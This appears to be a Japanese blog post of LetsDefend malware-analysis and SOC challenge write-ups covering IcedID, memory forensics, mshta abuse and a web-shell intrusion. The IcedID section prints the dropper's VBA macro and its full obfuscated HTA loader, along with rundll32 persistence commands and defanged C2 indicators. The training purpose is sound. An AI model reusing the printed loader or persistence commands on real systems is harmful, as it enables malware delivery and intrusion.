4ensiX

4ensiX

FPと言ったものはFPを選んだが表示はTPになっていることに気づいた。

LetsDefend Challenge Malware Analysis: Presentation As a Malware

LetsDefend Challenge Malware Analysis: Presentation As a Malware

What was the general name / category of the malicious file in the analyzed ppt file?

今回与えられたファイルのハッシュをvirus totalで検索する.

https://www.virustotal.com/gui/file/0289ee3c551ba84d34ab1760d042ab420733d96dbfedfae9718f8eb138c3259b

Hint: XX:YYYYY

ヒントの形式に合わせて.
A: VB:Trojan

Which of the url addresses it communicates with has been detected as harmful by sandboxes?

与えられたファイルに含まれるvbaを確認した.

難読

難読化解除は面倒なので,virus totalのレポートを確認した.
怪しいアクセス先

Answer

What is the name of the htm file that drops to disk?

virus totalのレポートにて,RELATIONSタブを確認すると,

virus total -> relations

A: hdkjashdkasbctdgjsa[1].htm

Which process is running to persistent under mshta.exe after the relevant malware runs?

virus totalだけでは,よく分からなかったので他のものも参照する.

https://www.joesandbox.com/analysis/358430/0/html

A: schtasks.exe

If there was a snort IDS in the environment at the time of the incident, which rules would it match?

virus totalにログインするとCrowdsourcedで引っかかったルール名も確認できる.

virus totalにログインして確認

A: EVENT_CTE_HEADER

LetsDefend Challenge DFIR: Memory Analysis writeup

LetsDefend Challenge DFIR: Memory Analysis

volatility2より,volatility3の方がインストールしやすいし使いやすいことに気付いてからはvolatility3を使っている.
Volatility - CheatSheet - HackTricks

What was the date and time when Memory from the compromised endpoint was acquired?


memory - windows.info

Answer: 2022-07-26 18:16:32

What was the suspicious process running on the system? (Format : name.extension)

SANSが公開しているWindowsの基本的なプロセスのポスターを眺めながら取り組んでいた.
Hunt Evil | SANS Poster
vol -f dump.mem windows.pslistで表示したもの↓

suspicious process

"lsass.exe"が怪しい.
Answer: lsass.exe

Analyze and find the malicious tool running on the system by the attacker (Format name.extension)

怪しいlsass.exeをvol -f dump.mem windows.pslit --pid 7592 --dumpでダンプする.
出てきたファイルのハッシュを検索すると,
https://www.virustotal.com/gui/file/ac87ce8b5902643dfedf4c3c02b91d7e06743e0bc2f3f87b0a4fbdd6ad111670

lsass.exeはwinPEAS.exeでした

Answer: winPEAS.exe

Which User Account was compromised? Format (DomainName/USERNAME)

vol3ではプロセスの環境変数を表示できる
vol -f dump.mem windows.envars --pid 7592 | grep USERを実行

DomainName&USERNAME

Answer: MSEDGEWIN10/CyberJunkie

What is the compromised user password?

volatility2のときは,SAMとSECURITYのアドレスを確認してから,そのアドレスをvolのコマンドに渡すことで表示していたがそれが一発でできるようになったよう.

vol3ではhashdumpで一気にいける

ここで見つけたCyberJunkieのハッシュをcrackstationに投げる.
crackstationでcrack

Answer: password123

LetsDefend Challenge DFIR: IcedID Malware Family writeup

LetsDefend Challenge DFIR: IcedID Malware Family

What is the sha256 hash for the malspam attachment?

何か前提がありそうで説明には書いていないのでよく分からないが,docがメールの添付ファイル?

$ sha256sum 'docs 06.02.2021.doc'
cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1  docs 06.02.2021.doc

Answer: cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1

What is the child process command line when the user enabled the Macro?

先ほどのdocファイルは,

$ file docs\ 06.02.2021.doc 
docs 06.02.2021.doc: Microsoft Word 2007+

Microsoft Word 2007+なので,ならoletoolsでマクロを見れる.

$ olevba -c docs\ 06.02.2021.doc 
olevba 0.60.1 on Python 2.7.17 - http://decalage.info/python/oletools
===============================================================================
FILE: docs 06.02.2021.doc
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO leftSize.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/leftSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub autoopen()
initVba
Shell "explorer collectionBoxConst.hta", vbNormalFocus
End Sub
-------------------------------------------------------------------------------
VBA MACRO arrayBBorder.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/arrayBBorder'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub initVba()
Open "collectionBoxConst.hta" & buttTemplateHeader For Output As #1
Print #1, ActiveDocument.Range.Text
Close #1
End Sub

.exeを付けてくださいと言われたので.
Answer: explorer.exe collectionBoxConst.hta

What is the HTML Application file's sha256 hash from previous question?

前の質問で実行されていたファイルのこと

$ sha256sum collectionBoxConst.hta 
b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100  collectionBoxConst.hta

Answer: b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100

Based on the previous question, what is the DLL run method?

collectionBoxConst.htaは,そのままだととても見づらい.
Beautifyを使うと見やすくなる.

/ <html>
  <body>
    <div id='copyCurrencyMemory'>fX17K(省略)mVmZVJ0c3VydCByYXY=aGVsbG8msscriptcontrol.scriptcontrol</div>
    <div id='vConstBorder'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div>
    <script language='javascript'>
      function WLongPtr(altListVba) {
        return (new ActiveXObject(altListVba));
      }

      function objButtBool(headerListbox) {
        return (removeConstFunction.getElementById(headerListbox).innerHTML);
      }

      function boolOptionClass() {
        return (objButtBool('vConstBorder'));
      }

      function sinBooleanCur(s) {
        var e = {};
        var i;
        var b = 0;
        var c;
        var x;
        var l = 0;
        var a;
        var memSetByte = '';
        var w = String.fromCharCode;
        var L = s.length;
        var intBorder = zeroI('tArahc');
        for (i = 0; i < 64; i++) {
          e[boolOptionClass()[intBorder](i)] = i;
        }
        for (x = 0; x < L; x++) {
          c = e[s[intBorder](x)];
          b = (b < < 6) + c;
          l += 6;
          while (l >= 8) {
            ((a = (b >>> (l -= 8)) & 0xff) || (x < (L - 2))) && (memSetByte += w(a));
          }
        }
        return (memSetByte);
      };

      function zeroI(genTempTextbox) {
        return genTempTextbox.split('').reverse().join('');
      }
      procDocumentI = window;
      removeConstFunction = document;
      procDocumentI.resizeTo(1, 1);
      procDocumentI.moveTo(-100, -100);
      var genericBoolean = removeConstFunction.getElementById('copyCurrencyMemory').innerHTML.split("aGVsbG8");
      var collectRightSingle = zeroI(sinBooleanCur(genericBoolean[0]));
      var vData = zeroI(sinBooleanCur(genericBoolean[1]));
      var viewPointerConvert = genericBoolean[2];
    </script>
    <script language='vbscript'>
      Function classResponseLocal(copyCurrencyMemory): Set snglSngTpl = CreateObject(viewPointerConvert): With snglSngTpl: .language = "jscript": .timeout = 60000: .eval(copyCurrencyMemory): End With: End Function
    </script>
    <script language='vbscript'>
      Call classResponseLocal(collectRightSingle)
    </script>
    <script language='vbscript'>
      Call classResponseLocal(vData)
    </script>
    <script language='javascript'>
      procDocumentI['close']();
    </script>
  </body>
</html>

base64等で難読化された何かをVBScriptで実行している箇所が2つある.

Call classResponseLocal(collectRightSingle)
Call classResponseLocal(vData)

実行に関わる辺りを取って表示する.後ろの方だけ変えて,再びcodebeautifyで実行する.

(変更した周辺箇所のみ表示)
      var viewPointerConvert = genericBoolean[2];
      document.write(" < br > < br > ");document.write(collectRightSingle);document.write(" < br > < br > ");document.write(vData);
    </script>
  </body>
</html>
(これ以降は削除)

こうして,取得できたのが以下のスクリプト
document.write(collectRightSingle);で表示されたもの.

collectRightSingle

document.write(vData);で表示されたもの.
vData

改行とインデントは何となく付けたものなので変ですかね.
2つのスクリプトが見える.ここで問われているのは,what is the DLL run method? ということで,
dllの方はフルパスでということなので.
Answer: "C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit

What is the image file dll installer sha256 hash from previous question?

難読化解除した前問のコマンドで利用されていたファイル.

$ sha256sum collectionBoxConst.jpg 
51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441  collectionBoxConst.jpg
$ file collectionBoxConst.jpg 
collectionBoxConst.jpg: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

このjpgファイルPEか.
Answer: 51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441

What are the IP address and its domain name hosted installer DLL?

installer DLLは,jpgに見せかけたPEファイルのことで,collectionBoxConst.jpgをダウンロードしたドメインのipを知りたい. コマンド実行時にドメイン名見えてたから,そのip引っ張ってこれば良いと思ったがip変わっているようなので,配布されているpcapでコマンド実行したときのipを確認しなければいけない.

$ tshark -r infection-traffic.pcap -Y "http.request"
    6   0.377723   10.6.2.103 → 45.142.213.105 HTTP 616 GET /adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC HTTP/1.1 
  966   8.610776   10.6.2.103 → 172.67.169.59 HTTP 334 GET / HTTP/1.1

どうやらipは45[.]142.213.105らしい.一応確認のため.

$ tshark -r infection-traffic.pcap -Y "http.request && ip.dst == 45.142.213.105" -V
(確認したかったところ以外省略)
    Arrival Time: Jun  2, 2021 16:49:58.629124000 EDT
(snip)
    Source: 10.6.2.103
    Destination: 45.142.213.105
Transmission Control Protocol, Src Port: 57592, Dst Port: 80, Seq: 1, Ack: 1, Len: 562
    Source Port: 57592
    Destination Port: 80
 (snip)
    Host: coursemcclurez.com\r\n
(snip)

Answer: 45[.]142.213.105, coursemcclurez[.]com
[.]はエスケープしているので,解答時は異なる.

What is the full URL for the DLL installer?

jpgに見せかけたPEファイルをダウンロードしたURL.(http://をhttp[:]//にしている.) Answer: http[:]//coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC

What are the two IP addresses identified as C2 servers?

pcapで見えるipは8つあった.

$ tshark -r infection-traffic.pcap -z conv,ip -q
================================================================================
IPv4 Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.6.2.103           <-> 194.5.249.46            1411   1987761     907     68828    2318   2056589    72.878155000        72.6158
10.6.2.103           <-> 172.67.169.59            548    778140     317     22306     865    800446     8.578007000        63.0912
10.6.2.103           <-> 38.135.122.194           418     41897     446    189140     864    231037   534.534514000       157.2711
10.6.2.103           <-> 45.142.213.105           402    573316     284     20504     686    593820     0.193640000         2.8731
10.6.2.103           <-> 65.8.218.70              183    252853      90      5755     273    258608     7.335177000        64.3388
10.6.2.103           <-> 185.33.85.35              70     13979      73     11177     143     25156    13.384999000       663.2378
10.6.2.1             <-> 10.6.2.103                 8       600       8       822      16      1422     0.000000000       675.7458
================================================================================

10[.]6.2.103と通信しているipは6つあり,45[.]142.213.105はダウンロードしただけと分かっている.
イマイチどれをピックアップするか分からないため,全部virustotal通すと38[.]135.122.194,194[.]5.249.46,185[.]33.85.35にフラグが立ったのでこれを組み合わせていくと.
Answer: 185[.]33.85.35, 194[.]5.249.46
例の如く,[.]
かなり適当になってしまったので,もう少し根拠が欲しい.全部怪しい.

What are the four C2 domains identified in the PCAP file?

ドメインというのでdnsを見てみると,

$ tshark -r infection-traffic.pcap -Y "dns"
Running as user "root" and group "root". This could be dangerous.
    1   0.000000   10.6.2.103 → 10.6.2.1     DNS 78 Standard query 0xc544 A coursemcclurez.com
    2   0.177849     10.6.2.1 → 10.6.2.103   DNS 94 Standard query response 0xc544 A coursemcclurez.com A 45.142.213.105
  689   7.268986   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xc52c A aws.amazon.com
  690   7.317488     10.6.2.1 → 10.6.2.103   DNS 168 Standard query response 0xc52c A aws.amazon.com CNAME tp.8e49140c2-frontier.amazon.com CNAME dr49lng3n1n2s.cloudfront.net A 65.8.218.70
  961   8.509279   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0x2368 A supplementik.top
  962   8.575830     10.6.2.1 → 10.6.2.103   DNS 108 Standard query response 0x2368 A supplementik.top A 172.67.169.59 A 104.21.79.67
 1825  13.295954   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xaa92 A fimlubindu.top
 1826  13.382333     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xaa92 A fimlubindu.top A 185.33.85.35
 1848  72.785911   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0xa7f4 A extrimefigim.top
 1849  72.876395     10.6.2.1 → 10.6.2.103   DNS 92 Standard query response 0xa7f4 A extrimefigim.top A 194.5.249.46
 1898  77.243965   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xcb22 A kilodaser4.fit
 1899  77.308989     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xcb22 A kilodaser4.fit A 185.33.85.35
 1911  77.687111   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe452 A arhannexa5.top
 1913  77.774932     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe452 A arhannexa5.top A 185.33.85.35
 5149 675.694370   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe5b5 A arhannexa5.top
 5150 675.745802     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe5b5 A arhannexa5.top A 185.33.85.35

185[.]33.85.35と194[.]5.249.46がc2であったと分かったので.
Answer: arhannexa5[.]top, extrimefigim[.]top, fimlubindu[.]top, kilodaser4[.]fit
[.]...

After the DLL installer being executed, what are the two domains that were being contacted by the installer DLL?

coursemcclurez[.]comへのすぐ後のdnsクエリを見ると
Answer: aws[.]amazon[.]com, supplementik[.]top

The malware generated traffic to an IP address over port 8080 with two SYN requests, what is the IP address?

問題で要求されている通りにフィルターして探す.

$ tshark -r infection-traffic.pcap -Y "tcp.flags.syn==1 && tcp.port == 8080"
 4275 534.534514   10.6.2.103 → 38.135.122.194 TCP 66 57609 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4276 534.589017 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57609 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=256
 4292 571.503808   10.6.2.103 → 38.135.122.194 TCP 66 57614 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4293 571.558688 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57614 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=25

Answer: 38[.]135.122.194
[.]...

The license.dat file was used to create persistance on the user's machine, what is the dll run method for the persistance?

persistanceというからにはここら辺で,scheduled-task.txtを見るという事ですかね.

$ cat 2021-06-02-scheduled-task.txt
(snip)
      <Command>rundll32.exe</Command>
      <Arguments>"C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"</Arguments>
(snip)

Answer: C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat

With OSINT, what is the malware family name used in this PCAP capture?

このチャレンジのタイトルにもなっているが,始めのdocをmalware bzaarで調べるのが一番分かりやすい.
https://bazaar.abuse.ch/sample/cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1/
Answer: IcedID

Based on Palo Alto Unit 42, what is the APT Group name?

調べます.
TA551: Email Attack Campaign Switches from Valak to IcedID
Answer: TA551

What is the Mitre Attack code for the initial access in this campaign?

先ほどのTA551の記事とmitreのInitial Accessをしばらく眺める.どれが一番適しているだろうか.添付ファイルの話から始まったぽいので.
Answer: T1566.001

LetsDefend level 1 alert SOC164 - Suspicious Mshta Behavior event-id 114

今回のアラート

SOC164 - Suspicious Mshta Behavior

Low reputation hta file executed via mshta.exe

mshta.exeを使って怪しいhtaファイルが実行された.
mshta.exe Microsoft(R) HTML アプリケーション ホスト – Windows files

Start Playbook!

まず,Ps1.hta(6685c433705f558c5535789234db0e5a)をvirustotalで検索する.

ps1.hta - virustotal

27 security vendors and no sandboxes flagged this file as malicious

ここまで赤いファイルであるなら,Maliciousなファイルであることに違いない.
RobertoのマシンをEndpoint Securityで確認する.
Command Historyを見ると,アラートの元になったコマンド実行の後には怪しいpoweshell scriptの実行もあった.

怪しいpowershell script

Process Listを見ると,怪しいpowershell scriptはmshta.exe Ps1.htaで実行されたように見える.
mshta.exe - process list

怪しいpowershell scriptがアクセスしていそうなhttp[:]//193.142.58.23/Server.txtもvirustotalで確認してみると
powershell scriptのアクセス先

maliciousになっている.Log Managementを見ると193.142.58.23へのアクセスは404が返されていた.

Determine Suspicious Activity

mshta.exeを利用しているケースをLOLBASで検索すると,今回と似たようなケースが見つかる.

https://lolbas-project.github.io/lolbas/Binaries/Mshta/#execute

Answer: Yes, suspicious

What Is Suspicious Activity?

Answer: Execute

Who Performed the Activity?

mshta.exeの親プロセスはexplorer.exeでした.
Answer: User

Add Artifacts

artifacts

End

appendix

Malware bazaarで検索すると,今回のPs1.htaのサンプルが見つかる.

malwarebzaar

Ps1.htaの中身は難読化されていた......
難読化されたvbscript

LetsDefend level 2 alert SOC154 - Service Configuration File Changed by Non Admin User event-id 102

Details

EventID : 102
Event Time : Sep, 04, 2021, 02:30 PM
Rule : SOC154 - Service Configuration File Changed by Non Admin User
Level : Incident Responder
Hostname : Brian
IP Address : 172.31.34.46
EDR Action : Allowed
Service Name : //lib//systemd//system//project.service
Tier 1 Note : I found that the permission of the file named project.service is set to 777. The file appears to have been modified on 04.09.2021 but I could not detect which user changed it.

playbook

Connect Machine

Incident Responderのアラートで扱うホストには直接アクセスして調査することができるようだ.

noVNCでアクセスして調査する

Verify

Alarms escalated from Tier1 to Tier2 should be caused by a truly harmful event, but escalated alarms by Tier1 analysts are not always True Positive due to technical inadequacy, faulty/incomplete analysis, and authorization problems. Tier1 から Tier2 にエスカレーションされるアラームは、真に有害な事象が原因であるべきだが、Tier1 アナリストによるエスカレーションアラームは、技術的な不備、誤った/不完全な分析、権限の問題などにより、必ずしも True Positive ではないことがある。


確かに,自分でも今までのアラートで間違った判断をしたことはある.こういうところも考慮して現実のシチュエーションを意識する(私は実践未経験です)というのは,letsdefendの良いところ.

Determine whether alert was TP or FP

//lib//systemd//system//project.service

件のアラートの元になったファイルの中身には,/tmp/shell.shという謎のシェルスクリプトが結びついている.

cat: /tmp/shell.sh: No such  file or directory

/tmpだからか.詰まった.どうしようかと手がかりを捜索.
その後色々見ていて,気になったのはrootのhistoryのこの部分

何か資格情報盗まれてる

盗まれてますね.何て言っていたら,このサーバ/var/www/htmlあると気づき.
webshell, LinEnum.........

すでに怪しさ満点である.
やはり,webshell.php

これをアップロードしたやつを見つければ良さそう.apache2ではなくて,nginxのaccess.logを見るとアップロードはfileadmin.phpで行ったよう.
fileadmin.php

そして発火してるもの.
webshellで捜索中?

やはり,18.217.124.122が今回悪さしているやつのようだ.この後,LinEnumのダウンロードや実行もwebshellで行っていた.そして,bashpythonでリバースシェルを試みて結局perlのリバースシェルが上手くいったのではないだろうか.
Answer: True Positive

Choose Incident Type

Answer: Generic

What is the initial access method used in the attack?

nginxのサービス?から来たようなので
Answer: Exploit Public-Facing Application

Determines Scope of Threat/Risk to the Organization

何て書けばいいか分からん.
Answer: Web service has been hacked into the server and stolen the credentials on this server.

What is the persistence method used in the attack?

ここで,今回のアラートにやっと戻ってくる.侵入後にサービスを作成し,/tmp/shell.shが永続性を確保するものだったのか./tmp/shell.shは再起動後には消えてしまう訳だが,そこら辺はどう考えていたのか分からない.project.serviceは現在は動いていないが.

project.service failed

ちゃんと動いていたときもあった.
project.service succeeded

Answer: Scheduled Task/Job

Were privilege escalation techniques used in the attack?

rootにアクセスしてるので
Answer: Yes

Which technique was used in the credential access tactic?

権限の緩いサービスを変更してroot実行させた.
Answer: None

Does the device need to be isolated?

Answer: Yes

End

result

PersistenceがScheduled Task/JobではなくてCreate or Modify System Processだったのはミスだった.よく考えたら,cronだったら合っていたがserviceだったか.
Credential Access がNoneではなくOS Credential Dumpingなのは問題の意味を分かっていなかったからかと.あそこで問われていたのは,rootへの権限昇格のために資格情報をどうやって取ってきたかだと思っていたが他の資格情報も含めてということだった?